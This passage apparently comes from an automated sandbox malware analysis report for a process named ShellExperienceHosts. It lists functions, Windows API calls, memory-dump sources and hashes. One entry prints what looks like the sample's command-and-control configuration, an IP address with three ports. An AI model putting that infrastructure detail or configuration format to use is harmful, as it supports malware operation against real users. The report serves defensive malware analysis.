                                                                            • Opcode Fuzzy Hash: 55d86d05b1e9edb7fd8f8241ea4acd49ec1cb6a552e8fd68b8b9a0a614a8ce91
                                                                            • Instruction Fuzzy Hash: 9611E57AB01324A7C760CA6ADCC8B5ABFADFB45374F144125F908D7280D278AD418654
                                                                            Function 6C86A16F Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,6C86A027,00000000,00000000,00000000,00000002,00000000), ref: 6C86A1AB
                                                                            • GetLastError.KERNEL32(?), ref: 6C86A1B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastPointer
                                                                            • String ID:
                                                                            • API String ID: 2976181284-0
                                                                            • Opcode ID: 8e371779aaa37c4d27d095733c665105baf1504469c5548c47eee0fe64bcda20
                                                                            • Instruction ID: 80853eb7cf6f5114f9c1a7927e47d34257d4d0cfcee26efd341a388455469ee8
                                                                            • Opcode Fuzzy Hash: 8e371779aaa37c4d27d095733c665105baf1504469c5548c47eee0fe64bcda20
                                                                            • Instruction Fuzzy Hash: C0010432604269AFCB158F5ADC05DDE3F69EF86328B240619E8129BAD0E771E951CB90
                                                                            Function 100030C0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: SleepTimetime
                                                                            • String ID:
                                                                            • API String ID: 346578373-0
                                                                            • Opcode ID: 306b1d3a46dce6522edd8cfdaf26c6c38e0bc8121be3e04cf2ef1a2578d2637d
                                                                            • Instruction ID: 27fac5dcdbeed923c3366fb10e8a319fa95706dbc2a1d72b4a6ad2049d896b26
                                                                            • Opcode Fuzzy Hash: 306b1d3a46dce6522edd8cfdaf26c6c38e0bc8121be3e04cf2ef1a2578d2637d
                                                                            • Instruction Fuzzy Hash: B501DF31A00206AFE302DF65C8C4BABB3F9FB99381F108624D1018B294C771ADD6C7E1
                                                                            Function 033230E0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: SleepTimetime
                                                                            • String ID:
                                                                            • API String ID: 346578373-0
                                                                            • Opcode ID: c3c65a646049d640eb036b155a49fb729badaf6c80d3565251da63ab00622729
                                                                            • Instruction ID: 1243a1c6b0f7bd2a63ba58cb988e12ae2e13dd39e4dd9d14546e63786cb41535
                                                                            • Opcode Fuzzy Hash: c3c65a646049d640eb036b155a49fb729badaf6c80d3565251da63ab00622729
                                                                            • Instruction Fuzzy Hash: EF01D439600215AFD315EF29CCC8BA9FBB9FB59321F184264E60497180C735B9C6C7D1
                                                                            Function 10006410 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • HeapCreate.KERNEL32(00000004,00000000,00000000,?,00000000,10005AF2), ref: 1000642B
                                                                            • _free.LIBCMT ref: 10006466
                                                                              • Part of subcall function 10001280: __CxxThrowException@8.LIBCMT ref: 10001290
                                                                              • Part of subcall function 10001280: DeleteCriticalSection.KERNEL32(00000000,?,10017E78), ref: 100012A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                            • String ID:
                                                                            • API String ID: 1116298128-0
                                                                            • Opcode ID: a128095ffdd49348268c3586f1fd9261e0840fd0acd737389bb6af715d81e8f7
                                                                            • Instruction ID: d75aab6d42964042dd9719b22c7254e4122bf8c787039a32894d973a0e8f9c7d
                                                                            • Opcode Fuzzy Hash: a128095ffdd49348268c3586f1fd9261e0840fd0acd737389bb6af715d81e8f7
                                                                            • Instruction Fuzzy Hash: D6017EF4A00B408FD321CF6A8884A47FAF9FF98750B104A1EE2DAC7A10D770A545CF55
                                                                            Function 0332CD00 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • HeapCreate.KERNEL32(00000004,00000000,00000000,0332E04E,00000000,03329800,?,?,?,00000000,0334125B,000000FF,?,0332E04E), ref: 0332CD1B
                                                                            • _free.LIBCMT ref: 0332CD56
                                                                              • Part of subcall function 03321280: __CxxThrowException@8.LIBCMT ref: 03321290
                                                                              • Part of subcall function 03321280: DeleteCriticalSection.KERNEL32(00000000,0332D3E6,03346624,?,?,0332D3E6,?,?,?,?,03345A40,00000000), ref: 033212A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                            • String ID:
                                                                            • API String ID: 1116298128-0
                                                                            • Opcode ID: 39e9c47ad2b624af580714096cb34a33ef42271309d25cff50d1605e1c888662
                                                                            • Instruction ID: f26e6971cd72577f2083076aa8f592a38e2a96634de12805c3b313c0a4e755a8
                                                                            • Opcode Fuzzy Hash: 39e9c47ad2b624af580714096cb34a33ef42271309d25cff50d1605e1c888662
                                                                            • Instruction Fuzzy Hash: 4F017AB4A00B508FC330DF6A9884A07FAF8FF98700B144A1EE6DAC7A10D370A105CFA5
                                                                            Function 6C6E2C90 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C6E2C97
                                                                            • GetWindowDC.USER32(00000000,00000004,6C7413FB,00000000), ref: 6C6E2CC3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3Window
                                                                            • String ID:
                                                                            • API String ID: 616115145-0
                                                                            • Opcode ID: 8ba0a3c05b2ddc08ec2d598acbac488b8ed8bffbfbeb351e0f179f1689c13da9
                                                                            • Instruction ID: 73e3a4557df31ccf356973527382492f9b9ed3b9b72fd329119d56f7ad0d7e60
                                                                            • Opcode Fuzzy Hash: 8ba0a3c05b2ddc08ec2d598acbac488b8ed8bffbfbeb351e0f179f1689c13da9
                                                                            • Instruction Fuzzy Hash: 10F08CF0A023159FDBA4DF68C50865E77F5BF0C708B10892EA5A9CBB00DB30D905CB98
                                                                            Function 6C8637D7 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,6C86F45A,?,00000000,?,?,6C86F0FA,?,00000007,?,?,6C86E8A5,?,?), ref: 6C8637ED
                                                                            • GetLastError.KERNEL32(?,?,6C86F45A,?,00000000,?,?,6C86F0FA,?,00000007,?,?,6C86E8A5,?,?), ref: 6C8637F8
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 485612231-0
                                                                            • Opcode ID: 6ee48e89f256da67bfd571d6f41e1dd1afde1909cf41562ae31a667cc04978cb
                                                                            • Instruction ID: b9f8ef41b3d42bc30b473223a5e33dc7b505d055cb2b9eb82fda88cd7346e463
                                                                            • Opcode Fuzzy Hash: 6ee48e89f256da67bfd571d6f41e1dd1afde1909cf41562ae31a667cc04978cb
                                                                            • Instruction Fuzzy Hash: 60E08632200218ABCF212FA59908BC53EB8EB1139DF10C434F50886A60DB34EC50C7E4
                                                                            Function 0332E480 Relevance: 3.0, APIs: 2, Instructions: 21synchronizationthreadCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateThread.KERNEL32(00000000,00000000,0332DF10,00000000,00000000,00000000), ref: 0332E49B
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03331168,?,?,?,?,?,?,03346298,0000000C,03331210,?), ref: 0332E4A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateObjectSingleThreadWait
                                                                            • String ID:
                                                                            • API String ID: 1891408510-0
                                                                            • Opcode ID: 2b4e3c6045ec144207b3037588e2d60f973b0f9f26853a278017896fb5f3852e
                                                                            • Instruction ID: 7b2a4b5d50a36b71269a84037ce238f938ef49db4739f7506788ff7cda448586
                                                                            • Opcode Fuzzy Hash: 2b4e3c6045ec144207b3037588e2d60f973b0f9f26853a278017896fb5f3852e
                                                                            • Instruction Fuzzy Hash: A6E012B5444319BFDF50EB54ACC5E37379CD704770F104715B920D2648DA35E8808660
                                                                            Function 10007175 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 10007181
                                                                              • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
                                                                              • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
                                                                              • Part of subcall function 10007156: __getptd_noexit.LIBCMT ref: 1000715B
                                                                              • Part of subcall function 10007156: __freeptd.LIBCMT ref: 10007165
                                                                              • Part of subcall function 10007156: ExitThread.KERNEL32 ref: 1000716E
                                                                            • __XcptFilter.LIBCMT ref: 100071A2
                                                                              • Part of subcall function 10009C41: __getptd_noexit.LIBCMT ref: 10009C47
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                            • String ID:
                                                                            • API String ID: 418257734-0
                                                                            • Opcode ID: 297936fcc0dbf5f526c0e08448a2f351abf61589ee907ea93caa2c8fedee672a
                                                                            • Instruction ID: 91050fa4c4edb40f5b5d990f834f761f3b027d6385ed46559f27b3ea4901cb17
                                                                            • Opcode Fuzzy Hash: 297936fcc0dbf5f526c0e08448a2f351abf61589ee907ea93caa2c8fedee672a
                                                                            • Instruction Fuzzy Hash: 76E0ECB9904604DFF718DBA0C956E6E7775EF44241F210049F1015B2A6CB35B940DB24
                                                                            Function 0332F983 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 0332F98F
                                                                              • Part of subcall function 03333E5B: __getptd_noexit.LIBCMT ref: 03333E5E
                                                                              • Part of subcall function 03333E5B: __amsg_exit.LIBCMT ref: 03333E6B
                                                                              • Part of subcall function 0332F964: __getptd_noexit.LIBCMT ref: 0332F969
                                                                              • Part of subcall function 0332F964: __freeptd.LIBCMT ref: 0332F973
                                                                              • Part of subcall function 0332F964: ExitThread.KERNEL32 ref: 0332F97C
                                                                            • __XcptFilter.LIBCMT ref: 0332F9B0
                                                                              • Part of subcall function 0333418F: __getptd_noexit.LIBCMT ref: 03334195
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                            • String ID:
                                                                            • API String ID: 418257734-0
                                                                            • Opcode ID: b2a1ee23d09800383d24b671f641a0d3119fc1d0b3d19f6df34c8488c5a31738
                                                                            • Instruction ID: 457a6ce900c1589f54b7e94ba268a728845271cbaf693dc628a36366e19a07c5
                                                                            • Opcode Fuzzy Hash: b2a1ee23d09800383d24b671f641a0d3119fc1d0b3d19f6df34c8488c5a31738
                                                                            • Instruction Fuzzy Hash: 26E0ECB9D00700EFEB18EBA1D985E7D7775AF46612F208148E1026F2A1CB79A940DA21
                                                                            Function 03336403 Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __lock.LIBCMT ref: 0333641B
                                                                              • Part of subcall function 03338E5B: __mtinitlocknum.LIBCMT ref: 03338E71
                                                                              • Part of subcall function 03338E5B: __amsg_exit.LIBCMT ref: 03338E7D
                                                                              • Part of subcall function 03338E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03333F06,0000000D,03346340,00000008,03333FFF,00000000,?,033310F0,00000000,03346278,00000008,03331155,?), ref: 03338E85
                                                                            • __tzset_nolock.LIBCMT ref: 0333642C
                                                                              • Part of subcall function 03335D22: __lock.LIBCMT ref: 03335D44
                                                                              • Part of subcall function 03335D22: ____lc_codepage_func.LIBCMT ref: 03335D8B
                                                                              • Part of subcall function 03335D22: __getenv_helper_nolock.LIBCMT ref: 03335DAD
                                                                              • Part of subcall function 03335D22: _free.LIBCMT ref: 03335DE4
                                                                              • Part of subcall function 03335D22: _strlen.LIBCMT ref: 03335DEB
                                                                              • Part of subcall function 03335D22: __malloc_crt.LIBCMT ref: 03335DF2
                                                                              • Part of subcall function 03335D22: _strlen.LIBCMT ref: 03335E08
                                                                              • Part of subcall function 03335D22: _strcpy_s.LIBCMT ref: 03335E16
                                                                              • Part of subcall function 03335D22: __invoke_watson.LIBCMT ref: 03335E2B
                                                                              • Part of subcall function 03335D22: _free.LIBCMT ref: 03335E3A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                            • String ID:
                                                                            • API String ID: 1828324828-0
                                                                            • Opcode ID: d81286980fdf0aa8ce4b32ad5c31f392b70fb13115ce5f26a40752890e54f261
                                                                            • Instruction ID: d7e5953460e52954ca59e0f48cab21f819f90a38f129040984221406520d430d
                                                                            • Opcode Fuzzy Hash: d81286980fdf0aa8ce4b32ad5c31f392b70fb13115ce5f26a40752890e54f261
                                                                            • Instruction Fuzzy Hash: CCE0C238C43310EBC722FBE0A6C360C7264AB83F31F90C149E4811A090CA3041C1C693
                                                                            Function 6C86D709 Relevance: 3.0, APIs: 2, Instructions: 17fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(6C8606D1,?,6C8606D1,?,?,?,?), ref: 6C86D711
                                                                            • GetLastError.KERNEL32(?,6C8606D1,?,?,?,?), ref: 6C86D71B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 2018770650-0
                                                                            • Opcode ID: 794d0fa7719bdaf3d14a1b3de4c1c9df1bd7d3cb5685efb27b8bb1ba48c0d804
                                                                            • Instruction ID: a75f7953eabc5c47291b568416b553571be90dbf02d02e4b7a308c1b0dbbf98f
                                                                            • Opcode Fuzzy Hash: 794d0fa7719bdaf3d14a1b3de4c1c9df1bd7d3cb5685efb27b8bb1ba48c0d804
                                                                            • Instruction Fuzzy Hash: 2AD0C97260524D678A201EBAAD0C8077BBC9B8227D3154A26F42DC5AA0DE29E851D695
                                                                            Function 1000474C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 12stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(|p1:118.107.44.112|o1:18091|t1:1|p2:118.107.44.112|o2:18092|t2:1|p3:118.107.44.112|o3:18093|t3:1|dd:1|cl:1|fz:), ref: 10004755
                                                                              • Part of subcall function 10003260: __wcsrev.LIBCMT ref: 10020655
                                                                            Strings
                                                                            • |p1:118.107.44.112|o1:18091|t1:1|p2:118.107.44.112|o2:18092|t2:1|p3:118.107.44.112|o3:18093|t3:1|dd:1|cl:1|fz:, xrefs: 10004750
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsrevlstrlen
                                                                            • String ID: |p1:118.107.44.112|o1:18091|t1:1|p2:118.107.44.112|o2:18092|t2:1|p3:118.107.44.112|o3:18093|t3:1|dd:1|cl:1|fz:
                                                                            • API String ID: 4062721203-2301998938
                                                                            • Opcode ID: ef503d5516fdfa215c481ae33ec846e637023be3d257a54ad483c27845c77df4
                                                                            • Instruction ID: 3065bb4344b1789bcecd08ba6036c617636919b35652953f12b0e4d8e139a27a
                                                                            • Opcode Fuzzy Hash: ef503d5516fdfa215c481ae33ec846e637023be3d257a54ad483c27845c77df4
                                                                            • Instruction Fuzzy Hash: EFC08C72208214CFF202E3D4988876D7359EB33722F608039FA00CD012E672CC8097B1
                                                                            Function 03326EBC Relevance: 3.0, APIs: 2, Instructions: 8registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegCloseKey.ADVAPI32(80000001,03326E9A), ref: 03326EC9
                                                                            • RegCloseKey.ADVAPI32(75BF73E0), ref: 03326ED2
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: fbc1c38e675962acd2f6bbb473c2e7a764daac659e4d3c42081064831e5a66da
                                                                            • Instruction ID: e2873d274771e3cf236a62ad860534c329d22f2d6ce8caf5cdd4bb77ed081227
                                                                            • Opcode Fuzzy Hash: fbc1c38e675962acd2f6bbb473c2e7a764daac659e4d3c42081064831e5a66da
                                                                            • Instruction Fuzzy Hash: 37C04C72D0102857CB10E7A4ED4494A77B85B4C210F1144C2A104A3114C634BD418F90
                                                                            Function 6C85FE6D Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9621fee9d8fd8256f8c5a66095308225b938b35d6a613c55f6df1e8a371667d5
                                                                            • Instruction ID: 81d14d582be0ff8d92b3c78d746e88f0a48d9a0c6e22ca7ad124d531c6fa8c31
                                                                            • Opcode Fuzzy Hash: 9621fee9d8fd8256f8c5a66095308225b938b35d6a613c55f6df1e8a371667d5
                                                                            • Instruction Fuzzy Hash: 9F511630A00208AFCB60CF58CA80E99BBB1EF5A368F248568F8495BB51C372DD51CB91
                                                                            Function 6C740F7C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C740F83
                                                                              • Part of subcall function 6C7412D8: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000001,6C8F39F0,?), ref: 6C741335
                                                                              • Part of subcall function 6C7412D8: VerSetConditionMask.KERNEL32(00000000), ref: 6C74133D
                                                                              • Part of subcall function 6C7412D8: VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 6C74134E
                                                                              • Part of subcall function 6C7412D8: GetSystemMetrics.USER32(00001000), ref: 6C74135F
                                                                            Memory Dump Source
